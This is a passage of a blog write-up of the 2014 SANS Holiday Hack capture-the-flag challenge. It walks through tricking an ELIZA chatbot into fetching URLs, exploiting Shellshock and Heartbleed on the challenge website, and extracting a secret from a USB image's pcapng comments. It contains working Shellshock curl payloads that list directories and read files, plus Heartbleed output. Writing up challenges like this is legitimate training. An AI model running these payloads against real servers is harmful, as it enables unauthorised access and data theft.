I missed last year’s holiday challenge, but it’s always one I look forward to. Ed Skoudis and his team always put together something clever, and this year is no exception. The challenge this year follows the story of A Christmas Carol by Charles Dickens. The characters in the story appear to be a loose portrayal of the staff of Counter Hack Challenges: Skoudis as Scrooge, Tom Hessman as Tiny Tom (rather than Tiny Tim), and Lynn Schifano as Mrs. Lynn Cratchit; and apparently, Ed keeps the secret room at the office a little cold for Lynn and Tom. Each of the three ghosts presents us with challenges that must be solved.
Flags Summary
Note that I’ve maintained the order I found the flags in below, not the order of their numbers.
Stave 3
Stave 4
Stave 5
Stave 1
In this version, Marley is Scrooge’s old hacking machine, rather than human business partner. Scrooge has become focused solely on hacking and exploit development for economic gain, without any regard to the consequences it may have on innocent people. He even brushes off his nephew’s discovery of a potential new hack that could be used for good.
While running a network scan on Christmas Eve, Marley, though it was clearly dead before, is online with the same domain name, IP address, and MAC address. Scrooge’s machine even recognized the SSH key presented, and after logging in with his passphrase, received a message of the day (motd) followed by his session closing immediately.
Much like in the original story, the motd from Marley tells Scrooge he needs to use his hacking for good, and that he will be visited by three spirits that night at the stroke of midnight. Scrooge runs into the server room and sees several machines floating around with similar messages, then everything disappears and he heads off to bed.
Back to top
Stave 2 – ELIZA Secret
The first ghost to appear is Alan Turing, who takes Scrooge to a security conference where a younger, energetic, and hopeful Scrooge was presenting. Before leaving, Turing tells Scrooge he wants to introduce him to an old friend:
She’s at 173.255.233.59 and has an important message to share with you, Scrooge. Feel free to connect with her, surf the Internet together, and see if you can discover her secret.”
This is the first challenge. Running an nmap scan on this IP will show the ports that are open that we might be able to connect to:
$ nmap -p1-65535 173.255.233.59
Starting Nmap 6.25 ( http://nmap.org ) at 2014-12-13 14:39 CST
Nmap scan report for li243-59.members.linode.com (173.255.233.59)
Host is up (0.059s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
31124/tcp open unknown
The SSH service requires public key authentication and we don’t have a key, so this doesn’t appear to be the way in:
$ ssh 173.255.233.59
Permission denied (publickey).
There appears to be a handful of filtered ports representing common Windows services and SMTP. However, the service on port 31124 is definitely non-standard. We can connect to it with netcat and get the following response:
$ nc 173.255.233.59 31124
I AM ELIZA. WHAT'S ON YOUR MIND?
So it looks like the spirit has pointed us to an instance of ELIZA, a sort of virtual psychotherapist. Written in the 1960s, ELIZA is definitely appropriate for the Ghost of Hacking Past to have put Scrooge in contact with. Converting the word ELIZA to numbers using a form of ‘leet-speak,’ we could see the following:
E -> 3
L -> 1
I -> 1
Z -> 2
A -> 4
The challenge to answer is “What secret did the Ghost of Hacking Past include on the system at 173.255.233.59?” The other hint from the Ghost was to “connect with her, surf the Internet together.” After trying different inputs, it appears the word “secret” in the question was also a clue. If we send “secret” three times, ELIZA will ask for a URL to surf to:
> secret
A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
> secret
YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
> secret
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?
I found it also works with the word “challenge”:
> challenge
A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
> challenge
YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
> challenge
I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO?
This implies we can get ELIZA to browse to any URL we give her and hopefully retrieve a flag.
First, we need to set up a web server or netcat listener on the Internet:
# nc -l 80
Since she asked for a URL to “surf to” and the Ghost said to “surf the Internet together,” we can try the following:
> surf to http://pwnible.superponible.com
After this, ELIZA pauses and doesn’t say anything in the chat window since our netcat listener didn’t respond. If we go back to that window, we’ll see the following:
# nc -l 80
GET / HTTP/1.1
Accept-Encoding: identity
Host: pwnible.superponible.com
Connection: close
User-Agent: Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing"
So the first flag is the message in the User-Agent string: “Machines take me by surprise with great frequency. -Alan Turing.”
Also of note in the User-Agent is the Bombe, which is a crypto machine developed by Alan Turing and Gordon Welchman during WWII at Bletchley Park. Here is some additional information on the 36 sets of drums referred to by the “Rotors:36” in the User-Agent.
We can also use “browse to” instead of “surf to”. Giving ELIZA a legitimate page, will have her ask if the page is correct and display the title of the page:
> browse to http://blog.superponible.com
DOES THIS LOOK LIKE THE CORRECT PAGE?
SUPERPONIBLOG | INFOSEC | DFIR | MALWARE
> browse to http://google.com
DOES THIS LOOK LIKE THE CORRECT PAGE?
GOOGLE
And if we give her a bad URL, she’ll complain about the link:
> surf to http://awega.asd
SORRY, THERE WAS AN ERROR READING YOUR LINK.
Another easter egg of sorts appears if we ask ELIZA about Alan Turing:
> turing
DR. TURING? I THINK OF HIM AS A DEAR FATHER, AND I AM DEEPLY PROUD OF HIS WORK.
> turing
I'LL FETCH DR. TURING'S WIKIPEDIA PAGE FOR YOU.
"ALAN MATHISON TURING, OBE, FRS (/TJR/ TEWR-ING; 23 JUNE 1912 7 JUNE 1954) WAS A BRITISH MATHEMATICIAN, LOGICIAN, CRYPTANALYST, PHILOSOPHER, PIONEERING COMPUTER SCIENTIST, MATHEMATICAL BIOLOGIST, AND MARATHON AND ULTRA DISTANCE RUNNER."
To find any other messages they might have added to ELIZA, I wrote the following script. It will read each line from the standard american-small wordlist on Ubuntu and send the line, then print the response. The list has about 50,000 words and it would only run about 15,000 at a time, so I had to run it multiple times, then combine the output. I printed the output to 4 files, then ran them through a grep that filters out the commands that were sent, then it sorts and uniqs them and sums up the count of unique lines. It took a while to run and I didn’t want to flood the server too bad, so I only ran the small word list.
Script contents:
#!/usr/bin/env python
import socket
import time
fh = open('american-english-small')
lines = fh.readlines()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('173.255.233.59',31124))
for line in lines:
if '\'' in line:
continue
print "SEND:", line
s.send(line)
time.sleep(.12)
print s.recv(1000)
time.sleep(.03)
s.close()
Script output:
# cat sans-eliza-response* | grep -v SEND | sort | uniq -c
40663
39888 >
3 A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
19 > ARE YOU DISCHUFFED?
2362 ARE YOU DISCHUFFED?
20 > ARE YOU NORMALLY SO SHAMBOLIC?
2386 ARE YOU NORMALLY SO SHAMBOLIC?
17 > BASH ON WITH IT THEN
2317 BASH ON WITH IT THEN
2308 BRILLIANT
21 > BRILLIANT
1 CAN YOU BE MORE SPECIFIC?
1 CAN YOU THINK OF ANYONE IN PARTICULAR?
1 DOES THAT REASON SEEM TO EXPLAIN ANYTHING ELSE?
22 > DO YOU NORMALLY NATTER ON LIKE THAT?
2216 DO YOU NORMALLY NATTER ON LIKE THAT?
30 > GO ON
2367 GO ON
25 > HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?
2420 HAVE OTHER PEOPLE SAID THAT YOU ARE STODGY?
2 HOW DO YOU DO. PLEASE STATE YOUR PROBLEM.
4 I AM ELIZA. WHAT'S ON YOUR MIND?
1 I AM NOT INTERESTED IN NAMES
24 > I AM NOT SURE I UNDERSTAND YOU FULLY
2326 I AM NOT SURE I UNDERSTAND YOU FULLY
25 > I DON'T MEAN TO RUSH YOU, BUT COULD YOU CHIVVY ON?
2338 I DON'T MEAN TO RUSH YOU, BUT COULD YOU CHIVVY ON?
1 I DON'T UNDERSTAND THAT
1 I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
3 I'M SORRY, BUT OUR TIME IS UP.
1 I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
2300 KEEN
24 > KEEN
27 > PLEASE CONTINUE
2349 PLEASE CONTINUE
21 > THAT ISN'T BLINDING, IS IT?
2353 THAT ISN'T BLINDING, IS IT?
25 > THAT SOUNDS LIKE A DODDLE
2386 THAT SOUNDS LIKE A DODDLE
10 > VERY INTERESTING
2397 VERY INTERESTING
22 > WHAT DOES THAT SUGGEST TO YOU?
2337 WHAT DOES THAT SUGGEST TO YOU?
1 WHAT DOES THIS DREAM SUGGEST TO YOU?
1 > WHAT DO YOU THINK?
1 WHAT DO YOU THINK ABOUT?
1 WHAT DO YOU THINK MACHINES HAVE TO DO WITH YOUR PROBLEM?
1 WHAT FEELINGS DO YOU HAVE WHEN YOU APOLOGIZE
1 WHAT SIMILARITIES ARE THERE?
1 WHEN?
25 > WOULD YOU SAY YOU WERE HAVING KITTENS OVER IT?
2409 WOULD YOU SAY YOU WERE HAVING KITTENS OVER IT?
1 YOU ARE BEING A BIT NEGATIVE.
1 YOU DO NOT SEEM QUITE CERTAIN
2 YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
23 > YOU'RE BEING A BIT WOOLY WITH ME
2293 YOU'RE BEING A BIT WOOLY WITH ME
1 YOU SEEM QUITE POSITIVE
Some of the output would get the “>” prepended and not print clearly, but these were just duplicates of other responses. Most of the responses are standard ELIZA ones. The ones below stood out as different:
root@pwnible:~# cat sans-eliza-response* | grep -v SEND | sort | uniq -c
3 A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
20 > ARE YOU NORMALLY SO SHAMBOLIC?
2386 ARE YOU NORMALLY SO SHAMBOLIC?
17 > BASH ON WITH IT THEN
2317 BASH ON WITH IT THEN
1 I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
3 I'M SORRY, BUT OUR TIME IS UP.
1 I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
2 YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
After completing the later challenges, a few of these appear to be hints:
- ARE YOU NORMALLY SO SHAMBOLIC? – shambolic is the password to the zip file in the USB challenge
- BASH ON WITH IT THEN – a hint about the BashBug, or Shellshock, in the web challenge
The “GIRL’S GOTTA KEEP HER SECRETS” line we saw earlier as a response to “secret” and “challenge”, but it appeared 3 times. The “YOU ARE REALLY INTERESTED” line also appeared 2 times. Looking at the trigger words for these, we can add “enigma”, “puzzle”, and “game” to the list.
# grep -B 2 'GIRL' sans-eliza-response*
sans-eliza-response1.txt-SEND: challenge
sans-eliza-response1.txt-
sans-eliza-response1.txt:A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
--
sans-eliza-response2.txt-SEND: enigma
sans-eliza-response2.txt-
sans-eliza-response2.txt:A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
--
sans-eliza-response3.txt-SEND: puzzle
sans-eliza-response3.txt-
sans-eliza-response3.txt:A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE?
# grep WEBSITE -B 2 sans-eliza-response*
sans-eliza-response2.txt-SEND: game
sans-eliza-response2.txt-
sans-eliza-response2.txt:YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
--
sans-eliza-response3.txt-SEND: secret
sans-eliza-response3.txt-
sans-eliza-response3.txt:YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES.
The “TIME IS UP” line appears to have been after a timeout in the system which explains why I was only able to get about 15,000 words with each run. Knowing this, I could’ve re-written the script to only run for a certain time, then disconnect itself and reconnect.
The other two lines mention LINKS, so we can check those triggers, then connect to ELIZA again and find that there’s actually a third response line as well:
# grep LINK -B 2 sans-eliza-response*
sans-eliza-response2.txt-SEND: link
sans-eliza-response2.txt-
sans-eliza-response2.txt:I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
--
sans-eliza-response2.txt-SEND: links
sans-eliza-response2.txt-
sans-eliza-response2.txt:I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
# nc 173.255.233.59 31124
I AM ELIZA. WHAT'S ON YOUR MIND?
> link
I ONLY CLICK ON LINKS THAT COME FROM PEOPLE I TRUST.
> link
I LOVE CLICKING ON LINKS. DO YOU HAVE A LINK FOR ME?
> link
YOU SEEM LIKE A NICE PERSON. I THINK I CAN TRUST THE LINKS YOU SEND ME.
> browse to http://google.com
DOES THIS LOOK LIKE THE CORRECT PAGE?
GOOGLE
After saying you’re a nice person, ELIZA will accept the link you send, similar to saying “secret” or one of the other words 3 times.
Those were all the special triggers I found. There may be others.
Back to top
Stave 3
The Ghost of Hacking Present appears next and it’s Johnny Long.
Johnny said he had something “CeWL” for Scrooge which is a big hint we’ll use later. The spirit takes Scrooge to a nearby delicatessen where he sees Mrs. Cratchit and Tiny Tom having a discussion about a recent pen test of Tom’s. He was able to do some hacking for good, and Johnny hoped seeing this would change Scrooge’s ways and prove that hackers could do good in the world, much like Johnny’s own organization Hackers for Charity.
The pen test was against the Shelter for Impossibly Cute Orphaned Puppies, or SICOP as Tom refers to it. It’s unclear if SICOP here is a reference to SICOP (a tool for identifying Significant Co-interaction Patterns) or S.I.C.O.P – Sistema Integrado para Control de Proveedores or something else entirely. Clearly, nothing to do with the secret, but potentially another easter egg in the challenge.
The scene has no impact on Scrooge and Johnny says he’s left two secrets on Scrooge’s own website http://www.scrooge-and-marley.com/ that will “shock [his] heart”.
Web Secret #2
Looking around the site, there’s not much to it. A few images, though nothing significant was found in the EXIF data. There is a voice message from Scrooge, but it’s just reading the text on the page. There is a link to a “Contact Us” page at http://www.scrooge-and-marley.com/contact.html.
The source code of the page indicates the form does a GET to a shell script:
<form role="form" action="/cgi-bin/submit.sh" method="GET">
At this point we have a few clues:
- a shell script
- Johnny said the secrets would “shock” Scrooge
- The ELIZA line the uses the word “BASH”
- we’re dealing with the Ghost of Hacking Present, and one of the biggest present day vulnerabilities was Shellshock, or the BashBug
Knowing this, we can attempt to exploit the script on this server and get a directory listing (using “echo *” (see below)) showing the submit.sh script in the current directory:
$ curl -A '() { :;}; echo; echo *' "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
submit.sh
Content-Type: text/html
<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">
We can make the output a little easier to read by adding some additional echo statements. This will print the command output on the line after “OUTPUT:” and the HTTP response from the webserver after “RESPONSE:”.
$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo *; echo; echo RESPONSE:' "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
OUTPUT:
submit.sh
RESPONSE:
Content-Type: text/html
<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">
It took some work to get a functioning command, along with a little help from a very timely post on the SANS Pen Test blog. The post starts off saying Ed Skoudis and Josh Wright were working on a recent project, which appears to have been this Holiday Challenge. The big takeaways from the post are how to do a directory listing and read a file in this restricted shell. The “echo *” used above is the equivalent of “ls.” We can use this to do some directory traversal.
One directory up:
$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo ../*; echo; echo RESPONSE:' "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
OUTPUT:
../1.png ../2.png ../3.png ../4.png ../a.mp3 ../a.ogg ../cgi-bin ../contact.html ../index.html
RESPONSE:
Content-Type: text/html
<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">
Two directories up:
$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo ../../*; echo; echo RESPONSE:' "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
OUTPUT:
../../lock ../../run ../../www
RESPONSE:
Content-Type: text/html
<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">
Three directories up:
$ curl -A '() { :;}; echo; echo; echo OUTPUT:; echo ../../../*; echo; echo RESPONSE:' "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
OUTPUT:
../../../bin ../../../dev ../../../etc ../../../lib ../../../lib64 ../../../run ../../../sbin ../../../secret ../../../selinux ../../../usr ../../../var
RESPONSE:
Content-Type: text/html
<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">
It looks like there’s a file called “secret” in the root directory. Now we can use the advice on how to read a file by changing the echo command to “while read line; do echo “$line”; done < ../../../secret”:
$ curl -A '() { :;}; echo; echo; echo OUTPUT:; while read line; do echo "$line"; done < ../../../secret; echo; echo RESPONSE:' "http://www.scrooge-and-marley.com/cgi-bin/submit.sh?name=blah&email=bob@bob.com"
OUTPUT:
Website Secret #2: Use your skills for good.
RESPONSE:
Content-Type: text/html
<META http-equiv="refresh" content="0;URL=http://www.scrooge-and-marley.com/">
So that gets us “Website Secret #2: Use your skills for good.”
Web Secret #1
Nothing else really stands out on the site as to how we might find secret number 1, so we can do an nmap scan:
$ nmap www.scrooge-and-marley.com
Starting Nmap 6.25 ( http://nmap.org ) at 2015-01-03 21:56 CST
Nmap scan report for www.scrooge-and-marley.com (23.239.15.124)
Host is up (0.063s latency).
rDNS record for 23.239.15.124: li723-124.members.linode.com
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
Of note here is that port 443, the standard HTTPS port is open. The site is accessible and looks the same if we connect to https://www.scrooge-and-marley.com/; however, we do have another clue. Shellshock was a big vulnerability this year, but another present day vulnerability is Heartbleed, and the ghost told Scrooge the secrets he placed would shock his “heart.”
We can download a publicly available exploit script for testing for the Heartbleed vulnerability and name it heartbleed-ssltest.py, then run it (the ‘grep’ is to remove null data so the output is smaller).
$ python heartbleed-ssltest.py www.scrooge-and-marley.com 443 | grep -v '00 00 00 00 00 00'
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 584
... received message: type = 22, ver = 0302, length = 397
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C ......SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 76 65 64 25 ....#.......ved%
00e0: 32 30 69 74 25 32 30 73 65 65 6D 65 64 25 32 30 20it%20seemed%20
00f0: 74 6F 25 32 30 73 63 61 74 74 65 72 25 32 30 67 to%20scatter%20g
0100: 6C 6F 6F 6D 25 32 30 61 6E 64 25 32 30 6D 79 73 loom%20and%20mys
0110: 74 65 72 79 2E 25 30 41 25 30 41 49 74 25 32 30 tery.%0A%0AIt%20
0120: 77 61 73 25 32 30 73 68 72 6F 75 64 65 64 25 32 was%20shrouded%2
0130: 30 69 6E 25 32 30 61 25 32 30 64 65 65 70 25 32 0in%20a%20deep%2
0140: 30 62 6C 61 63 6B 25 32 30 67 61 72 6D 65 6E 74 0black%20garment
0150: 25 32 43 25 32 30 77 68 69 63 68 25 32 30 63 6F %2C%20which%20co
0160: 6E 63 65 61 6C 65 64 25 32 30 69 74 73 25 32 30 ncealed%20its%20
0170: 68 65 61 64 25 32 43 25 32 30 69 74 73 25 32 30 head%2C%20its%20
0180: 66 61 63 65 25 32 43 25 32 30 69 74 73 25 32 30 face%2C%20its%20
0190: 66 6F 72 6D 25 32 43 25 32 30 61 6E 64 25 32 30 form%2C%20and%20
01a0: 6C 65 66 74 25 32 30 6E 6F 74 68 69 6E 67 25 32 left%20nothing%2
01b0: 30 6F 66 25 32 30 69 74 25 32 30 76 69 73 69 62 0of%20it%20visib
01c0: 6C 65 25 32 30 73 61 76 65 25 32 30 6F 6E 65 25 le%20save%20one%
01d0: 32 30 6F 75 74 73 74 72 65 74 63 68 65 64 25 32 20outstretched%2
01e0: 30 68 61 6E 64 2E 25 32 30 42 75 74 25 32 30 66 0hand.%20But%20f
01f0: 6F 72 25 32 30 74 68 69 73 25 32 30 69 74 25 32 or%20this%20it%2
0200: 30 77 6F 75 6C 64 25 32 30 68 61 76 65 25 32 30 0would%20have%20
0210: 62 65 65 6E 25 32 30 64 69 66 66 69 63 75 6C 74 been%20difficult
0220: 25 32 30 74 6F 25 32 30 64 65 74 61 63 68 25 32 %20to%20detach%2
0230: 30 69 74 73 25 32 30 66 69 67 75 72 65 25 32 30 0its%20figure%20
0240: 66 72 6F 6D 25 32 30 74 68 65 25 32 30 6E 69 67 from%20the%20nig
0250: 68 74 25 32 43 25 32 30 61 6E 64 25 32 30 73 65 ht%2C%20and%20se
0260: 70 61 72 61 74 65 25 32 30 69 74 25 32 30 66 72 parate%20it%20fr
0270: 6F 6D 25 32 30 74 68 65 25 32 30 64 61 72 6B 6E om%20the%20darkn
0280: 65 73 73 25 32 30 62 79 25 32 30 77 68 69 63 68 ess%20by%20which
0290: 25 32 30 69 74 25 32 30 77 61 73 25 32 30 73 75 %20it%20was%20su
02a0: 72 72 6F 75 6E 64 65 64 2E 25 32 30 26 57 65 62 rrounded.%20&Web
02b0: 73 69 74 65 25 32 30 53 65 63 72 65 74 25 32 30 site%20Secret%20
02c0: 25 32 33 31 3D 48 61 63 6B 69 6E 67 25 32 30 63 %231=Hacking%20c
02d0: 61 6E 25 32 30 62 65 25 32 30 6E 6F 62 6C 65 25 an%20be%20noble%
02e0: 32 65 68 92 53 EF 28 61 CF 95 2B C4 4A A2 F3 32 2eh.S.(a..+.J..2
02f0: C3 CA 99 93 B5 0D 59 59 59 59 59 59 59 59 59 59 ......YYYYYYYYYY
0300: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 YYYYYYYYYYYYYYYY
0310: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 YYYYYYYYYYYYYYYY
0320: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 YYYYYYYYYYYYYYYY
0330: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 YYYYYYYYYYYYYYYY
0340: 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 YYYYYYYYYYYYYYYY
0350: 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79 yyyyyyyyyyyyyyyy
0360: 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79 79 yyyyyyyyyyyyyyyy
0370: 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 ................
0380: 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 ................
0390: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 ................
03a0: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 ................
03b0: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 ................
03c0: D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 D9 ................
03d0: E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 E9 ................
WARNING: server returned more data than it should - server is vulnerable!
Sometimes it requires running the command a few times, but clearly, the server is vulnerable and the lines 02a0 through 02e0 contain the secret:
Website%20Secret%20%231=Hacking%20can%20be%20noble%2e
OR
Website Secret #1=Hacking can be noble.
Now we have both secrets from the Ghost of Hacking Present.
One final note on this section. When I first ran through the challenge, I ran Nikto against Scrooge’s site. It didn’t find anything related to secrets for the challenge, but it did find a server status page at http://www.scrooge-and-marley.com/server-status. The page allowed you to see all the HTTP requests coming into the server; however, that page was no longer available at the time of writing this report. Below is the output from nikto from when I ran the scan, but I don’t have an example of the page itself.
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 23.239.15.124
+ Target Hostname: www.scrooge-and-marley.com
+ Target Port: 80
+ Start Time: 2014-12-12 16:25:06 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 132479, size: 4604, mtime: 0x509e19689069f
+ The anti-clickjacking X-Frame-Options header is not present.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
+ 6545 items checked: 1664 error(s) and 5 item(s) reported on remote host
+ End Time: 2014-12-12 16:35:05 (GMT-5) (599 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Back to top
Stave 4
Finally, Scrooge meets the Ghost of Hacking Yet To Come. The spirit hands Scrooge a USB drive full of untold secret horrors. Though the drive is only 8MB, Scrooge sees enough to scare him into asking the spirit if it’s too late to change his ways. Then, the spirit shrivels down into a bedpost. Our challenge is to find four secrets the Ghost of Hacking Future left on the USB drive.
We can download the USB drive image as hhusb.dd.bin, then mount it in a Linux system:
# mount hhusb.dd.bin /mnt
# cd /mnt
# ls
hh2014-chat.pcapng LetterFromJackToChuck.doc
PCAP – USB Secret #2
The first file is a pcap file hh2014-chat.pcapng. Opening it in Wireshark, there’s a web based chat in the PCAP, which was implied in the filename:
The chat messages are from a server at chat.scrooge-and-marley.com and all start with ‘{“id”‘ in the HTTP payload, so we can create a quick tcpdump command to dump all the messages. The -A will print all the ASCII in the packets; the first grep will only print chat lines, which start with {“id”; the first awk will extract the 6th field (colon delimited), which contains the message; and the last awk will print all but the last field (comma delimited), which removes a “timestamp” line in each message.
$ tcpdump -nnr hh2014-chat.pcapng -A | grep ^\{\"id\" | awk -F: '{print $6}' | awk -F',"' '{$NF=""}1'
reading from PCAP-NG file hh2014-chat.pcapng
"My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able scrape together enough to meet him minimum payment and stay out of debtor's prison. Please tell me of your progress, my love."
"As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear."
"Is it good... or bad?"
"Bad."
"We are quite ruined."
"No. There is hope yet, Caroline."
"If he relents, there is. Nothing is past hope, if such a miracle has happened."
"He is past relenting. He is dead."
"That is wondrous news! To whom will our debt be transferred?"
"I don't know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline!"
"I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it. We now have a very happy house. I so love you."
"I shall see you soon, my dear. Lovingly -- Samuel."
The message is between and man and woman, whose family was in debt to Scrooge, and contains a conversation in which the man was letting his wife know Scrooge is dead. She tells him the children were very happy to hear that news. This is definitely a message Scrooge wouldn’t like to see, but there’s no secret here.
The PCAP file is in .pcapng format, the next generation PCAP format, which allows comments. We can see packets in Wireshark by using the “pkt_comment” display filter:
Alternatively, we can workout a single command to extract the comments in tshark using a similar filter.
$ tshark -nnr hh2014-chat.pcapng -2 -Y pkt_comment -V | grep comment -A 1 | egrep -v 'comment|--'
VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==
https://code.google.com/p/f5-steganography/
The Wireshark screenshot showed two packets and the command line kung fu extracted the two comments. The first is base64 encoded. We can pipe this output to a base64 decoder and get the secret (using -D here on Mac, on Linux use -d):
$ tshark -nnr hh2014-chat.pcapng -2 -Y pkt_comment -V | grep comment -A 1 | egrep -v 'comment|--'| base64 -D
USB Secret #2: Your demise is a source of relief.
So the PCAP contained USB Secret 2. The second comment with a URL to the F5 steganography tool is a hint for another secret.
DOC – USB Secret #1
